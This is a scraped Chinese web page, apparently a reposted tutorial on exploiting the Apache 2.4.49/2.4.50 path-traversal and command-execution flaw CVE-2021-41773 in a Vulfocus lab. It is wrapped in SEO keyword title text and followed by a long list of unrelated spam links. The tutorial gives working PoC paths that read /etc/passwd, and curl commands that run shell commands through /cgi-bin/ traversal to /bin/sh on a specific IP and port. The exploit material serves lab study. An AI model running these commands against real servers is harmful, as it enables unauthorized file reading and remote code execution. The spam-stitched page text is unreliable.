当前位置: 首页 > news >正文

php网站模板开源产品设计

php网站模板开源,产品设计,聊城开发网站建设,addthis wordpress本文仅作为学习参考使用#xff0c;本文作者对任何使用本文进行渗透攻击破坏不负任何责任。 前言: 本文主要讲解apache命令执行漏洞#xff08;cve_2021_41773#xff09;。 靶场链接#xff1a;Vulfocus 漏洞威胁分析平台 一#xff0c;漏洞简介。 cve_2021_41773漏洞…本文仅作为学习参考使用本文作者对任何使用本文进行渗透攻击破坏不负任何责任。 前言: 本文主要讲解apache命令执行漏洞cve_2021_41773。 靶场链接Vulfocus 漏洞威胁分析平台 一漏洞简介。 cve_2021_41773漏洞是一个目录穿越的高危漏洞主要影响版本有Apache阿帕奇 2.4.49 和 Apache 2.4.50其对路径规范化所做的更改中存在一个路径穿越漏洞攻击者可利用该漏洞读取到Web目录外的其他文件如系统配置文件、网站源码等甚至在特定情况下攻击者可构造恶意请求执行命令控制服务器。 二poc。 具体poc已给出 get传参方式poc为 /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd可以看到是一段经过了url编码的内容解密后为 2post传参 /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh 经过两次url解码后结果为 三漏洞利用。 打开靶场连接后可以发现是一个阿帕奇服务的默认界面。 通过抓包后发现传参方式为get 此处使用get传参的poc。 进行攻击测试poc填写到红框内 可以看到回显为修改请求头所读的敏感信息。 此处为什么要用burp因为浏览器自动对路径进行了一次url解码用burp发送过去的请求不会被自动解码 ‍四rce。 1查看敏感文件。 在kali上使用curl 命令进⾏进一步渗透工作。 读取敏感文件的命令为 curl -v --path-as-is http://[ip]:port/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd ① [ip] 替换成被攻击服务器的 IP。 ② port 替换为被攻击服务器端⼝。 curl简介Linux命令行工具curl详解与服务器之间传输数据_curl socks5代理-CSDN博客 2通用操作。  具体格式为 curl --data echo;shell http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh 替换shell为想要执行的命令。 取得敏感信息查询一下当前用户 curl --data echo;whoami http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh 查看一下当前目录 curl --data echo;pwd http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh 获取flag curl --data echo;ls /tmp http://123.58.224.8:27400/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
http://www.w-s-a.com/news/707208/

相关文章:

  • 手机网站建设视频长沙百家号seo
  • 网站未备案怎么访问网站开发前端需要学什么
  • 正黄集团博弘建设官方网站wordpress设置固定链接和伪静态
  • wordpress 建网站视频如何实现网站生成网页
  • 杭州品牌网站建设推广个人的网站建设目标
  • 济南有哪些网站是做家具团购的贸易公司自建免费网站
  • wap网站psd成立公司在什么网站
  • 网站建设婚恋交友聊城网站建设费用
  • 沈阳网站建设联系方式尉氏县金星网架公司
  • 医院网站建设实施方案基础微网站开发信息
  • 网站建设开发服务费记账百度指数搜索
  • 网站建设备案流程windows优化大师有必要安装吗
  • 怎么网站定制自己做网站卖视频
  • 网站开发二线城市网站制作过程中碰到的问题
  • 最好网站建设公司制作平台小程序开发教程资料
  • 陕西省高速建设集团公司网站国内做会展比较好的公司
  • 建设学校网站的原因网页设计实训报告1500
  • 网站建设客户来源江门网站设计华企立方
  • 自己如何做棋牌网站宁波网络推广优化方案
  • 深圳招聘网站推荐seo网站推广方案
  • 彩票网站开发 合法学术会议网站建设
  • 商务网站建设论文答辩pptseo技术博客
  • 怎样才能有自己的网站桂林搭建公司
  • 哪个网站做视频赚钱万科
  • 莆系医疗网站建设wp如何做网站地图
  • 网站建设应急处置方案团购网站 备案问题
  • 网站建设 岗位职责浙江中天建设集团有限公司网站
  • 西海岸建设局网站用wordpress建站学什么
  • 网站静态和动态学校网站建设流程步骤
  • 做群头像的网站在线怎么做俄语网站